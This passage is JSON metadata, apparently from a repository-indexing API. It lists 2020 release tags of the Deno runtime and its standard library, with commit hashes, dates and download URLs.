b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","de